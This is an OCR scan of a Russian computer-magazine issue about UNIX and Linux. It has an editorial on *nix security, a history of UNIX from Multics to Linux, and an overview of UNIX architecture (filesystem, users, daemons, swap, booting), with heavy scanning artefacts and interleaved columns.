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есять лет назад *nix не был широкораспространенной, народной системой. Сложные, 

громоздкие *тх'сы использовались только в качестве серверов, а подходить к ним 

осмеливался лишь грамотный сисадмин. По сравнению с Windows (глюк на глюке в то время), 
UNIX отличался своей строгостью, функциональностью и... неприступностью. Теперь все изменилось. 
Архитектура UNIX с огромной скоростью клонируется, разработчики создают для пользователей 
красивые графические оболочки, упрощают процесс установки. Девиз последних нескольких лет: 
"Даешь Linux Ha декстопе!" Я верю, что в конце концов цель будет достигнута: в школах, офисах и 
госучреждениях Linux может надолго обосноваться на десктопах. Что бы ни говорила Mirosoft, но open 
source *тх-системы дешевле и выгосбнее, чем Windows. 

Вроде бы, все довольны. Но, как известно, чем больше в системе рюшечек, тем больше впоследствии 
обнаруживается в ней багов и недоработок. Поэтому user 11епу-дистрибутивы все чаще становятся 
мишенью для хакерских атак. Да и рост интереса к *тх-системам дает о себе знать: bugtraq пестрит 
новыми Юникс-уязвимостями куда ярче, чем виндовыми. 

В этом номере мы постарались развеять миф о неприступности *тх-систем, по крайней мере, в 
сегодняшнем их виде. Но несмотря на обилие эксплоитов, Во5'еров, авторутеров, сканеров и другого 
облегчающего работу взломщика софта, все не так печально. Грамотная настройка системы в девяти 
случаях из десяти - залог ее безопасности. Причем, чтобы правильно сконфигурировать *nix не нужно 
быть семи пядей во лбу: достаточно усвоить основные принципы, которые мы попытались доходчиво 
изложить в разделе "Защита". 
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КАК ЭТО БЫЛО... 


программер... 


М стория *nix-cucTem насчитывает более 30 лет. Давай совершим небольшое 
путешествие во времени к самым истокам этой оси, в то время, когда 
компы были большие, а собственную ОС не писал разве что ленивый 
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НАЧАЛО НАЧАЛ: OT 
BESYS ДО MULTICS 

UNIX был разработан аме- 
риканской лабораторией Bell 


Labs, входившей в состав 
конторы Ве! Systems. История этой компа- 
нии в области информационных технологий 
началась в 1957 году, когда ее сотрудникам 
потребовалась операционная система для 
собственного вычислительного центра, в 
котором использовалась ЭВМ второго поко- 
ления. От такой системы требовалось авто- 
матизировать запуск некоторых программ и 
управление вычислительными ресурсами. 
Новоиспеченную систему назвали BESYS. 
Разумеется, она была совершенно не похо- 
жа на современные операционные системы, 
и применять ее могли разве что сами разра- 
ботчики для собственных целей. А в те вре- 
мена больше ничего и не требовалось - 
компьютеров было Mano, и работали с ними 
лишь программисты и ученые, а уж о необ- 
ходимости компьютера дома или в офисе 
никто не задумывался. В 1964 году контора 
приобрела более мощную машину третьего 
поколения, и тут же возник вопрос о новой 
оси, так как старая годилась лишь для той 
машины, для которой ее делали. Никаких 
общих стандартов совместимости тогда не 
существовало. Для участия в разработке 
операционной системы были приглашены 
специалисты из Массачусетского института 
и корпорации General Electric. И закипела 
работа над новой осью, названной Bnocneg- 
ствии Ми с$ (Multiplexed Information and 
Computing System), - многозадачной, много- 
пользовательской ОС с разделением вре- 
мени и пользовательским интерфейсом. С 
помощью нее несколько пользователей од- 
новременно могли получать доступ к вы- 
числительным ресурсам. При создании бы- 
ли использованы наработки Массачусетско- 
го института, реализованные ранее в дру- 
гой экспериментальной оси - CTSS. В ито- 
ге, получилась достаточно сложная в ис- 
пользовании, громоздкая и дорогая опера- 
ционка, в которой, к тому же, существовал 
ряд ошибок, связанных, в основном, с неу- 
дачно выбранным языком программирова- 
ния PL/I. Кроме этого, среди разработчи- 
ков возникли некоторые организационные 
разногласия. Короче говоря, проект заг- 
нулся. Но оставил после себя различные 
идеи, в частности, идеи по файловой сис- 
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теме, которые были использованы в даль- 
нейших разработках. 


К ЧЕМУ ПРИВОДИТ ГЕЙМЕРСТВО, 
ИЛИ НАЧАЛО «ЭРЫ UNIX» 

После закрытия проекта сотрудники Bell 
Labs на некоторое время пересели Ha соз- 
данную компанией General Electrics систему 
GECOS. Узкие возможности этой системы ни- 
кого из работников лаборатории не устраи- 
Banu. И в это время, как гласит легенда соз- 
дания УМХ, один из разработчиков, прини- 
мавших активное участие в проекте Multics, 
Кеннет Томпсон, создал простенькую по тем 
временам игрушку - Space Travel, которая, к 
сожалению, не могла нормально работать на 
тех машинах, что имелись в лаборатории. 
Компьютеры ведь применялись лишь для на- 
учных задач, и никто не думал тогда об их ис- 
пользовании в качестве игровых автоматов. 
По официальной версии, Томпсон и его кол- 
лега Денис Ритчи написали начальству заяв- 
ку на приобретение более мощной машины 
для разработки новой операционной систе- 
мы. Если верить легенде, им всего лишь хо- 
телось нормально поиграть в свое творение 
5). Заявку, разумеется, отклонили, и приш- 
лось новоявленным геймерам довольство- 
ваться небольшим (по тогдашним меркам) 
компьютером РОР-7, хотя он вполне подхо- 
дил по объему оперативной памяти, да к то- 
му же обладал графическим дисплеем. Тут- 
то и пришла им в головы мысль использо- 
вать эту машину для написания собственной 
универсальной операционки (а может, чтобы 
просто оправдаться перед начальством в 
потребности более мощной машины :)). Томп- 
сон решил воплотить в невиданной доселе 
операционке все самые удачные идеи, кото- 
рые появились при разработке Ми сз, а 
именно: иерархическая древовидная структу- 
ра файловой системы, концепции файла и 
процесса, командный интерпретатор для 
пользователя, многопользовательский ре- 
жим работы (могли работать два пользовате- 
ля одновременно) и много чего еще. Работа 
шла таким образом: на имевшемся до этого 
компьютере General Electric 635 писали ассе- 
мблерный код и потом с помощью перфо- 
ленты переносили Ha PDP-7, на которой впос- 
ледствии отлаживали. Так было получено 
простенькое ядро будущей системы, тексто- 
вый редактор, несколько утилит и собствен- 
ный Ассемблер. При этом оси требовалось 
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всего 12 килобайт оперативной памя- 
ти (столько весило ядро системы), 8 
килобайт занимали программы и ути- 
литы, а максимально допустимый раз- 
мер файла составлял 64 килобайта. 
После этого можно было полностью 
продолжать работу уже на самой 
РОР-7 в создаваемой операционке. 
Первоначальное название, которое 
было придумано для новоиспеченно- 
го продукта, - UNICS (Uniplexed 


Information and Computing System). И 
немного позднее было сокращено до 
привычного нам UNIX (какому прог- 
раммисту захочется писать лишнюю 
букву в слове :)). Вот так, созвучно с 
безвременно сгинувшей Multics, Кен и 
Денис назвали свое творение, даже и 
не подозревая тогда, что такое же 
созвучие в название будут приобре- 
тать практически все будущие клоны 
этой легендарной операционки. Прои- 
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Денис Ритчи 


зошло это в 1969 году, а официаль- 
ной датой рождения UNIX и началом 
так называемой «эры УМХ» стало 

1 января 1970 года. 

В 1971 году лаборатории Bell Labs 
потребовалась система обработки 
текстов, и в качестве платформы для 
нее был выбран полюбившийся всей 
конторе UNIX. Да и ктому времени 
удалось разжиться более мощной 
машиной - РОР-1. В это время Томп- 
сон работал над компилятором языка 
Fortran, но то, что в итоге у него полу- 
чилось, было названо языком В, ко- 
торый немного позднее превратился 
во всем нам хорошо известный С. В 
1973 году UNIX был переписан на 
язык С, что сделало систему пол- 
ностью переносимой. А в 1974 ucxog- 
ники UNIX стали распространяться в 
университетах за символическую 
плату, что обеспечило дальнейшую 
популярность этой оси, а также нача- 
ло вовлекать в разработку все новых 
и новых разработчиков. Небольшая 
цена, понятный и доступный для изу- 
чения код на С, гибкость и переноси- 
мость, возможность настроить ось 
под любую конфигурацию сделали 
ее привлекательной для большого 
количества не только профессиона- 
лов, но и любителей. Таким образом, 
были разработаны великий тексто- 
вый редактор vi (Билл Джой), воз- 
можность работы с виртуальной па- 


От Multics 
УМХ унас- 
ледовал 
иерархичес- 
кую древо- 
видную 
структуру 
файловой 
системы, 
концепцию 
файла и 
процесса, 
командный 
интерпрета- 
тор для 
пользовате- 
ля, много- 
пользова- 
тельский 
режим рабо- 
ты... 


Новые ре- 
дакции 
УМХ рож- 
дались 
очень час- 
то. Всего за 
период с 
1971 года по 
1979 год 
появилось 
11 редакций! 
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НЕПРИСТУПНЫЙ *NIX 


ТЕОРИЯ 


Компьютер PDP-11 и основатели UNIX - Томпсон и Ритчи. 


Даже мел- 
комягкие 


оставили 
свой след в 
развитии 
UNIX! 
XENIX - 
совместный 
продукт 
scou 
Microsoft! 


Меньше чем 
через пол- 
года после 
своего появ- 
ления Linux 
распростра- 
нился уже 
далеко за 
пределами 
Финляндии. 


мятью (Поркер и Бабаоглу) и множе- 
ство других примочек. 

Немного поздней АТ&Т решила внес- 
ти некоторый порядок в столь бурный 
выход новых версий, и в 1982 году 
несколько последних версий были 
объединены в одну, что получило наз- 
вание UNIX System Ill. В 1983 году 
вышла первая коммерческая версия 
UNIX, которая называлась System \. В 
ней появились такие понятия, как ме- 
ханизм взаимодействия процессов, за- 
мещение страниц и семасроры. К 1989 
году вышла новая версия System V 
Release 4, вновь объединившая досто- 
инства последних версий. Самыми зна- 
чительными сфишками этой версии 
стали сокеты, сетевая сайловая сис- 
тема (NFS) и новые интерпретаторы 
ksh и csh. В 1993 году права на UNIX 
были проданы компании Novell, кото- 
рая потом передала их конторам 
X/Open и Santa Cruz Operation (SCO). 

Но что это мы все о UNIX ga о UNIX? 
Ведь эта ось, обретя популярность, 
получила множество параллельных 
веток развития, которые до сих пор 
развивают как многочисленные ком- 
пании, так и народные умельцы. 


BSD, SOLARIS И ДРУГИЕ 

Одной из значительных ветвей 
развития UNIX стала знаменитая 
ось BSD (Berkley Software 
Distribution). B 1976 rogy TomncoH 
поехал в Калифорнийский универ- 
ситет, где шестой редакцией UNIX 
очень заинтересовались аборигены. 
Среди них оказался Билл Джой. Он- 
то и разработал свою версию УМХ, 
запихнув в нее кучу собственных 
примочек, в том числе компилятор 
Паскаля, и назвав ее BSD. В даль- 
нейшем при вмешательстве минис- 
терства обороны США (DARPA) в 
1980 году был разработан протокол 
ТСРЛР, что дало возможность рабо- 
ты операционки в локальной сетке. 
Также в BSD добавился редактор vi 
и командный интерпретатор C-Shell. 
Ось распространялась практически 
бесплатно, а ближе к нашему вре- 
мени мутировала в FreeBSD, 
OpenBSD и NetBSD. Была выпущена 
и коммерческая версия BSD/OS для 
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ИСТОРИЯ UNIX ) 


ОСНОВНЫЕ ОСОБЕННОСТИ УМХ-СИСТЕМ: 


В 1996 году в лаборатории Лос Аламос 
был произведен эксперимент по расчетам 
ядерного взрыва, в ходе которого 
соединили 68 компов с LINUX в одну 
систему, чтобы они работали как один 
большой многопроцессорный 
суперкомпьютер. Скорость вычислений 
этой системы достигла 19 миллиардов 
действий в секунду. 


Легендарный Линус Торвальдс - созда- 
тель Linux 


|ВМ-совместимых машин. 

Также Билл Джой основал фирму 
Sun Microsystems и занялся разра- 
боткой SunOS, позднее ставшей из- 
вестной Kak Solaris, для станции 
SPARC, а также Intel, Pentium Pro и 


Power РС. Эта ось позаимствовала 
многое от UNIX System V Release 4. А 
Solaris являлся, по сути, тем же 
SunOS, но обросшим дополнительны- 
ми примочками, и, самое главное, гра- 
фическим интерфейсом. 

Кроме BSD и SunOS, появились Ha 
свет другие подвиды UNIX, выпускае- 
мые различными фирмами. Среди них 
стоит упомянуть такие оси, как АХ, вы- 
пущенная IBM для тачек RS/6000, HP- 
UX, выпущенная Hewlett Packard gna 
мультипроцессорных тачек с поддерж- 
кой больших сфайловых систем, IRIX, 
разработанная Silicon Graphics gna гра- 
фических станций и суперкомпьюте- 
ров; Digital UNIX (он же Tru64 UNIX) 
cpupMb! DEC, предназначенная для 
мощных серверов, с поддержкой прак- 
тически всех сетевых интерфейсов и 
улучшенными драйверами для работы 
с винчестерами, и многие другие. 


OT MINIX К LINUX, ИЛИ КАК 
РАЗВОДИЛИ ПИНГВИНОВ 

И вот, наконец, добрались мы и go 
всеми нами любимой Мпих. История 


этой операционки, надо сказать, не 
менее навороченная и интересная, 
чем история UNIX. За гораздо мень- 
шее время, чем прошло для УМХ, эта 
ось успела обрасти не меньшим коли- 
чеством всевозможных клонов. Сама 
OC Linux появилась в начале 90-х 
прошлого века, но история ее берет 
начало еще в 1987 году. В то время 
некий датский профессор Энарю Тан- 
ненбаум написал книгу «Операцион- 
ные системы», в качестве учебного 
пособия к которой прилагался ucxog- 
ник маленькой операционки разме- 
ром всего 12 000 строк кода - Minix. 
Это было нечто похожее на UNIX. Ось 
предназначалась для работы на 
компьютерах с процессором 8086. 
Книжка приобрела большую популяр- 
ность и попала в 1991 году в руки ни- 
кому еще не известному студенту вто- 
рого курса и хакеру-любителю Линусу 
Торвальдсу из Хельсинки. Испробо- 
вав Minix, он решил, что система впол- 
не даже интересная, но требует дора- 
ботки, и приступил к разработке 
собственной операционки. А в это 
время некий Ричард Столлмен зани- 
Manca своим проектом GNU, создавая 
бесплатное программное обеспече- 
ние. Он даже разработал собствен- 
ный вариант компилятора языка С. Но 
тогда не было подходящей ОС для его 
работы. То, что сделал на тот момент 
Торвальдс, привлекло внимание Стол- 
лмена, и они решили объединить уси- 
лия. С этого момента началась слав- 
ная эпопея Linux. 

В сентябре 1991 появилась Linux 
0.01. В нее были портированы GCC и 
bash (Born Again Shell). А к октябрю 
появилась и версия 0.02. Уже тогда 
все это распространялось бесплат- 
но, вместе с исходниками и доку- 
ментацией, так же, как и в наши 
дни. Но пока что Linux все же оста- 
вался любительской осью. Почти 
каждый месяц появлялись более 
доработанные версии Linux, но go 
0.10 версии все они поддерживали 
только АТ-винчестеры, загружались 
сразу в bash и не имели функции 
логина пользователей. В О.1 версии 
появилась поддержка мультиязыч- 
ных клавиатур, флоппи-дисководов, 
VGA- и ЕСА-дисплеев. Совсем скоро 
начали появляться различные ва- 
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Консоль (bash) Linux 


рианты Linux, собранные энтузиас- 
тами и профессионалами по всему 
миру. Появились всем известные 
Red Hat, Debian, Caldera, а также 
различный сосбрт и утилиты. Еще 
больше внимания к этой оси прив- 
лекло появление в ней графическо- 
го интерфейса X-Window и KDE. 

Позднее Linux был портирован на 
карманные устройства Ра!т и 
PocketPC, а также на Mac (MacOS Х). 
Кроме этого, были добавлены утили- 
ты и эмуляторы для запуска прило- 
жений от других операционок. Нап- 
ример, в наше время в Linux с по- 
мощью таких утилит можно запус- 
кать такие программы, как 1С-Бухгал- 
терия, и некоторые компьютерные 
игрушки. В современные дистрибути- 
вы уже входит огромный набор соф- 
та и утилит на все случаи жизни: от 
web-cepBepos и средств разработки 
go аналогов клиента ICQ и проигры- 
вателя WinAmp, остается только 
выбрать при установке, что тебе 
нужно поставить прямо сейчас. Но 
главное - это, конечно, как и у всех 
УМХ-подобных, открытый код и воз- 
можность настроить систему под 
свое железо и свои требования или 
изменить ее до неузнаваемости - бы- 
ли бы необходимость, желание и 
умение программировать. Не менее 
важна, так Kak Linux развивается 
быстро и постоянно выходят новые 
дистрибутивы, возможность обнов- 
ления и изменения ядра системы, бе- 
зо всяких переустановок системы 
или программ (не то что Винда!). 

В наше время Linux продолжает yc- 
пешно развиваться и привлекает к 
себе внимание все новых и новых 
пользователей. Именно эта ось, а так- 
же FreeBSD, стали основным выбором 
администраторов меб-серверов и кор- 
поративных систем. Понятие «УМХ» 
давно уже не означает какую-то конк- 
ретную стандартную 


“2 = РУ 1 
Стандартная оболочка KDE в Linux 


ось, а объединяет все 
операционки этого се- 
мейства, отвечающие 
определенным требо- 
ваниям. В сетке всег- 
да можно найти кучу 
сосфта и драйверов 
под всевозможные 
устройства, а в много- 
численных форумах и 
конференциях - за- 
дать любой вопрос, 
на который обяза- 
тельно ответят. Доб- 
< в вв ропожаловать в мир 
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ОТЕЦ ДЕМОНА —_ 
И ПИНГВИНА 


КОГДА МЫ БЫЛИ 


m На дворе 1969 год. 
К компьютерам имеют доступ лишь 
избранные профессора крупней- 
ших университетов. Время работы у 
терминала строго ограничено, и за 
каждой минутой загрузки машины 
ведется строгий учет. Стоимость Og- 
ного вычислительного центра приб- 
лижается к бюджету небольшой 


ОСОБЕННОСТИ АРХИТЕКТУРЫ UNIX 


ность программной модели, но фунда- 


МОЛОДЫЕ, ментальных изменений не вносили. 
А КОМПЬЮТЕРЫ - 
БОЛЬШИЕ ОСНОВНЫЕ ПЛЮСЫ СИСТЕМЫ 


Многопользовательская ОС 

m Уже в 70-е годы OC УМХ была мно- 
гопользовательской системой, то есть 
за одним компьютером могло работать 
несколько пользователей одновремен- 
но. При этом система заботится о том, 
чтобы всем хватало ресурсов, чтобы 
пользователи не могли оказать ника- 


NO WAR- страны. Именно на такой машине, кого влияния друг на друга. 
РИ называвшейся РОР-7, программис- 

ED - девиз ты Денис Ритчи (Dennis Ritchie), Многозадачность 

модели Pagg Кенедей (Rudd Canaday), Дуг ш B UNIX используется вытесняю- 


Open Source 
наших дней. 


Макилрой (Doug Mcllroy) и Кен 
Томпсон (Ken Thompson) в течение 
месяца написали ОС, оболочку, ac- 
семблер и редактор. 

Следующей вехой развития UNIX 
считается его первое портирование 


ть. ЕН на машину с другой архитектурой. На 
UNIX, напи- более производительном PDP-11/20 
асе UNIX был полностью переписан с ас- 
т при 
Ритчи ука- семблера на язык Би ("В"). С 1970 go 
зал на за- 1972 UNIX развивался компанией 
метно воз- 
росший AT&T Ве! Lab. В 1973 году Ритчи и 
объем (20- Томпсон перевели операционную сис- 
40%) и на тему на язык С. К этому моменту UNIX 
ухудшение 
производи- был установлен на 25 машинах - нем- 
тельности ного, но если ты вспомнишь, сколько 
ОС в целом б _ 
по сравне- всего компьютеров было тогда в ми 
uate с ассе- ре, то поймешь, что означали эти инс- 
мблерным - 
вармантом таллы новой системы. ОС обретала 
кода. новое звучание в компьютерном ми- 


ре, о ней начали говорить как о серь- 
езном проекте. Пятая редакция проек- 
та внесла огромный вклад в развитие 
системы в целом - исходные коды 
UNIX стали доступны студентам уни- 
верситетов. Началась эра массового 
увлечения *nix и его клонами. В уни- 
верситете г. Беркли собирается груп- 
па разработчиков и начинается вы- 
пуск клонов UNIX - В$О-систем. После 
этого происходит непрерывное совер- 
шенствование исходных кодов систе- 
мы, но концепция операционной сис- 
темы сложилась именно в 70-е годы 
двадцатого столетия. Последующие 
версии и клоны устраняли слабые 
места и увеличивали функциональ- 
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щая многозадачность, которая бази- 
руется на понятии приоритетов и 
квантования процессорного времени. 
Все процессы разбиваются по нес- 
кольким группам в зависимости от TO- 


го, кто их запускает. Кроме этого, про- 
цессы-дети получают права родите- 
лей, изменение приоритета возможно 
только системным вызовом, иници- 
ируемым ядром или пользователем 
root. Основными считаются три клас- 
са: приоритет реального времени, сис- 
темных процессов, класс процессов 
разделения времени. Но не только от- 
ношение к определенному типу прио- 
ритетов регулирует процессорное 
время для данного приложения, еще 
существует понятие кванта времени. 
Грубо говоря, эта переменная регла- 
ментирует, через сколько тиков сис- 
темных часов следует передать уп- 
равление следующему процессу. 


Переносимость кода 

и Одним из самых существенных 
достоинств всех клонов UNIX является 
возможность переноса ОС практичес- 


рис. Константин Комардин 


ки под любые платформы. Если рань- 
ше ядро и некоторые драйвера были 
написаны на ассемблере, дающем за- 
метный прирост производительности, 
но, вместе с тем, практически полную 
несовместимость с архитектурами, от- 
личными от данной, то сейчас вся сис- 
тема написана на языке высокого 
уровня С. Это означает, что для запус- 
ка UNIX на любой новой архитектуре 
достаточно портировать компилятор 
языка С и пересобрать систему из ис- 
ходных кодов. Таким образом, мы по- 
Лучаем практически универсальную 
ОС со множеством приложений. 


Свободное распространение 

и Это один из основных плюсов 
УМХ-клонов наших дней. Изначаль- 
но UNIX была платной и закрытой 
системой, но с течением времени все 
изменилось в лучшую сторону, и сей- 
час активно развиваются две основ- 
ных лицензии оля *nix: BSD (nog ней 
выпускается FreeBSD) и GPL. Основ- 
ное отличие BSD от GPL в том, что, в 
принципе, по инициативе разработ- 
чиков возможно превращение про- 
дукта из свободного в закрытый, ком- 
мерческий. Самая демократичная и 
популярная на сегодняшний день - 
это GPL, nog ней выпускается Linux и 
его клоны. Существуют также разно- 
го вида коммерческие лицензии, ос- 
нованные на продаже ОС. 


Нетребовательность 
к ресурсам РС 

m На сегодняшний день для x86 
*п-системы - самые малотребова- 
тельные относительно аппаратной 
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стороны машины. Для работы роутера 
на *BSD достаточно 386-го процессо- 
раи 4 мегабайт памяти. Обеспечить 
данные функции на других распрост- 
раненных системах при такой конори- 
гурации РС просто невозможно. При- 
чем даже на такой слабой машине, по 
нынешним меркам, UNIX показывает 
все свои пучшие стороны. Объяснить 
такое поведение можно, рассмотрев 
архитектуру ОС более подробно. 


АКСИОМЫ UNIX-LIKE 0С 


Собственная файловая система 
ш Основными понятиями срайловых 
систем *nix являются следующие: 
Каталог (аналогия в Windows - пап- 
ка, директория) - это, прежде всего, 
файл, содержащий системную инерор- 
мацию о файлах, входящих в данный 
каталог. В директории могут быть ката- 
логи более низкого уровня, обычные 
файлы, специальные срайлы. Каталоги 
создает пользователь или система при 
выполнении определенных действий. 
Обычный файл (аналогия в Windows 
- все файлы системы). Вся информа- 
ция, хранимая на компьютере, содер- 
жится в обычных сфайлах. Создавать, 
удалять, изменять файлы может любой 
пользователь, имеющий права на за- 
пись в каталог и изменение срайла. 
Именно в файлах содержатся все сис- 
темные программы, настройки и данные. 
Специальный cpaiin - особый тип 
файлов, присущий *пих-системам. 
Представляет собой служебную за- 
пись на диске, символизирующую со- 
кет, участок памяти, процесс и некото- 
рые другие вещи. Чаще всего эти 


http://ois.mesi.ru/html_docs/BACH/ - подробная книга, которую 


можно скачать в 1 Zip-apxuBe. 


http://linuxdoc.chat.ru/obsh/rukadmina/index.html - книга 95-го го- 
да, но своей актуальности она не потеряла. 


файлы имеют нулевую или очень ма- 
ленькую длину и после перезагрузки 
удаляются. Специальные сдфайлы соз- 
дает ядро системы или прикладные 
программы по мере необходимости. 
Обычный пользователь создавать та- 
кие записи не может. Главная особен- 
ность этого типа - файлы создаются и 
удаляются системой автоматически, 
юзер чаще всего не может прочитать 
их содержимое - они не содержат дан- 
ных, доступных для обработки. 

Вся необходимая для работы с фай- 
лом информация хранится в особой 
системной таблице, которая является 
индексным дескриптором (inode) дан- 
ного объекта. Индексные дескрипторы 
всех файлов равны по размеру - 64 
байта. В них хранятся данные о типе 
файла, физическом расположении 
файла на диске, размере в байтах, да- 
та создания, время последней моди- 
фикации, последнего обращения к 
файлу, информация о привилегиях 
доступа. Все inode пронумерованы и 
содержатся в особом отделе файло- 
вой системы. Для ОС порядковый но- 
мер срайла есть уникальное имя сфай- 
ла. Полное имя объекта по его номеру 
устанавливается с помощью таблицы 
иерархии каталогов. 


Существует один главный 
администратор - root, и он бог 
данного хоста 

и Эта особенность полностью соот- 
ветствует духу UNIX: если ты - админ, 
то это подразумевает твои обширные 
знания в данной области. Власти root'a 
хватит на любое действие в системе: от 
прочтения домашних каталогов поль- 
зователей до удаления всех файловых 
систем на жестком диске, причем он 
даже не получит ни одного предупреж- 
дения от системы. Концепция UNIX 
подразумевает грамотного админа- 
root'a, в отличие от творения Б.Г. 


Юзеры могут делать только 
то, что явно разрешено 

и Одна из самых сильных сторон 
пользовательской модели *пх-сис- 
тем. Администратор при создании 
учетной записи нового юзера дает 
ему определенные права и возмож- 
ности для работы с системой. Разде- 
ление прав на файлы происходит с 
помощью атрибутов. Достаточно зап- у 


В системе 
УМХ ис- 
пользуется 
вытесняю- 
щая много- 
задачность, 
базирующа- 
яся на по- 
нятиях при- 
оритета и 
квантова- 
ния. 


+ МХ 


Ss 
a 
= 
|= 
> 
- 
о 
& 
о. 
|= 
ш 
= 


*NIX 


НЕПРИСТУПНЫЙ 


Загрузчик GRUB 


ТЕОРИЯ | ОТЕЦ 


ЕМОНА И ПИНГВИНА ) 


ретить чтение сфайла, установив соот- 
ветствующий бит, и никто, кроме 
root'a, не сможет узнать содержимое. 
Кроме очень гибкой модели атрибу- 
тов, админ делит пользователей на 
реальных, то есть тех, которые могут 
заходить с терминала или удаленно 
по сети, и на специальных - тех, у кого 
есть права для выполнения какой-ли- 
бо из определенных задач. Например, 
обычный пользователь Vasya, имея 
аккаунт на машине, может подклю- 
чаться к ней с помощью клавы-мони- 
тора (как обычный юзер локального 
ПК), через ssh из любой точки плане- 
ты (если нет ограничений на место 
подключения), используя модем и 
терминальную программу (minicom, 
telemax, стандартный терминал Вин- 
дов). При любом способе подключе- 
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ния юзер будет находиться в системе, 
как будто он работает с физического 
локального терминала. Специальные 
пользователи (виртуальные), такие, 
Kak, nobody, ftp, anonymous, присут- 
ствуют в системе только как аккаунты, 
и вход с этих учетных записей через 
терминалы невозможен. Они исполь- 
зуются для общесистемных сервисов 
с целью ограничения их прав: так де- 
MOH ftp запускается от пользователя 
ftp, Apache - от nobody; это необходи- 
мо для повышения безопасности и 
стабильности системы. 


У демонов минимально 
необходимые привилегии 

В первоначальных редакциях 
UNIX этого не было, но с приходом се- 
тей и хакеров разработчики задума- 
лись и доработали концепцию систе- 
мы. На практике это выглядит так: у 
каждого крупного сервиса есть 
“свой” специальный пользователь, от 
его учетной записи запускаются все 
процессы данного сервера. Так, нап- 
ример, для меб-сервера Apache прак- 
тически всегда создается специаль- 
ный пользователь породу, на все ра- 
бочие каталоги ставится владельцем 
этот юзер и раздаются соответствую- 
щие права, после чего B init-ckpunte 
прописывается логин “nobody”. В ре- 
зультате - резкое повышение безо- 
пасности всего хоста: даже если будет 
найдена уязвимость в демоне, то 
взломщик получит права непривиле- 
гированного пользователя apache. 


Наличие средств для 
выполнения простых действий 
*пх-системы отличаются OT множе- 
ства других ОС тем, что любое самое 
сложное действие можно легко раз- 
бить на несколько более простых, реа- 
лизуемых с помощью встроенных 
средств. То есть если пользователь хо- 
рошо знает возможности UNIX-apxu- 
тектуры и четко представляет себе ре- 
зультат своих трудов, то добиться его 
будет очень легко. Примерами средств, 
заметно упрощающих реализацию лю- 
бой задачи, могут служить такие обще- 
известные приложения, как сгоп (пери- 
одический запуск задач), перенаправ- 
ления выводов и вводов с терминала, 
syslog (погирование всех действий в 
системе), различные комбинации 
действий на ФС и многое другое. 


Свопинг позволяет работать 
эффективней 
Механизм виртуальной памяти 

поддерживается всеми клонами УМХ 
на уровне ядра. Есть два основных 
способа организации Swap-npoctpaH- 
ства: раздел на жестком диске (или от- 
дельный винчестер, только под swap) 
или файл на существующем разделе. 
Использование раздела или отдельно- 
го винчестера предпочтительно из со- 
ображений скорости обмена данных. 

В УМХ введен принцип перемеще- 
ния виртуальных страниц процесса из 


swap-paggena в оперативную память 
по запросу. При запуске любого при- 
ложения ядро УМХ загружает лишь 
минимально необходимый для запус- 
ка кусок кода, после чего передает 
ему управление. После этого работа, 
как с физической памятью, так и со 
swap, будет регулироваться запроса- 
ми программы. Если в ходе выполне- 
ния софтины обнаружится, что запра- 
шиваемый виртуальный адрес данно- 
го дескриптора процесса отсутствует, 
то менеджер виртуальной памяти об- 
ратится к диску и загрузит необходи- 
мый кусок дампа в оперативку. Когда 
будет использована вся доступная 
физическая область, менеджеру вир- 
туальной памяти придется выгрузить 
какую-то часть данных на диск, о чем 
будет сделана соответствующая за- 
пись. Для выбора вымещаемых стра- 
ниц необходимо провести анализ, что- 
бы не сбросить сегмент, необходимый 
для работы, через несколько тактов. 
Эту функцию выполняет специаль- 
ный процесс pageout. 


ГЛАВНОЕ - ЗАГРУЗИТЬСЯ! 
“Loading УМХ” - фраза, говоря- 
щая о многом. Рассмотрим два ос- 
новных способа загрузки ядра систе- 
мы. Почему ядра, а не всей ОС? По- 
тому что будет отличаться только 
загрузка ядра, после того как оно бу- 
дет в памяти, все остальное загружа- 
ется стандартной и отлаженной про- 
цедурой. Самый простой вариант - 
это Воо{-дискета. Ход загрузки систе- 
мы при таком способе выглядит 
очень просто: после начального тес- 
та BIOS передает управление загру- 
зочной области дискеты, где содер- 
жится код, распаковывающий ядро 
UNIX в оперативную память. После 
распаковки начинается стандартное 
монтирование корневого раздела. Но 
такой простой вариант применяется 
только для дискет без файловых 
систем. Для винчестеров использу- 
ют несколько усложненный вариант 
загрузки. Причина этого достаточно 
простая: ядро не может быть записа- 
но в первые сектора, так как там на- 
ходится таблица разметки жесткого 
диска и описания всех ФС, при порче 
этих данных использовать хард 
просто невозможно. Поэтому разра- 
ботчики применили усложненный ал- 
горитм инициализации ядра. После 
РОЗТ-теста управление, как обычно, 
передается загрузочной области 
жесткого диска, где хранится миниа- 
тюрная программа, вся работа кото- 
рой сводится к запуску главного заг- 
рузчика ОС, обладающего достаточ- 
ной функциональностью и гиб- 
костью для запуска ядра. Таким 
“большим” загрузчиком может быть 
LILO, GRUB или стандартный BSD- 
loader. А уже этот загрузчик копиру- 
ет ядро в память, передав ему необ- 
ходимые параметры. Как видишь, 
при загрузке с винчестера использу- 
ются двухуровневые программы. 


Свободный UNIX для свободных людей 


Я хочу продолжить рассказ о схеме загрузки UNIX-cuc- 
тем, так как загрузка является еще одним архитектур- 
ным решением сообщества разработчиков ОС. Сущест- 
вует две основные схемы загрузки UNIX и его клонов: 
BSD и System V. В$О-тип применяется во многих BSD- 
системах и в некоторых дистрибутивах Linux (Gentoo, 
Slackware). Схема BSD проще System V, но и возможнос- 
тей у нее меньше. Рассмотрим более прогрессивную 
System \. Сначала загружается ядро ОС, будь то UNIX, 
BSD-knoH или Мпих-клон, после этого ядро монтирует 
корневую файловую систему, ссылка на которую ему пе- 
редана параметром загрузчика. При удачном заверше- 
нии операции начинается поиск служебного каталога 
/sbin; если он не обнаруживается, то система выдает 
“Kernel panic”. Затем происходит запуск главного про- 
цесса Init: отдается команда /sbin/init. После чего уже Init 
обращается к каталогу /etc и ищет там файл inittab, где 
указан необходимый уровень запуска. Осталось не так 
уж много: пЁ читает и анализирует содержимое своего 
конфигурационного срайла, а затем запускает необходи- 
мые сервисы, монтирует локальные файловые системы, 
поднимает сетевые интерфейсы, монтирует уваленные 
файловые системы и запускает оставшиеся сервисы. На 
завершение процесса загрузки укажет (если система 
загрузится не в multiuser mode) появившееся приглаше- 
ние ввести логин и пароль пользователя. 


ЯДРО - ВСЕМУ ГОЛОВА! 

Главным, определяющим архитектуру системы звеном 
является ядро. Все ядра *гих-систем должны выполнять 
следующие функции: 

- управление работой процессов: создание, завершение и 
организация взаимодействия между ними. 

- планирование очередности работы процессов, переклю- 
чение выполняемых задач. Сюда входит и расстановка 
приоритетов для задачи управления мультипроцессорны- 
ми системами. 

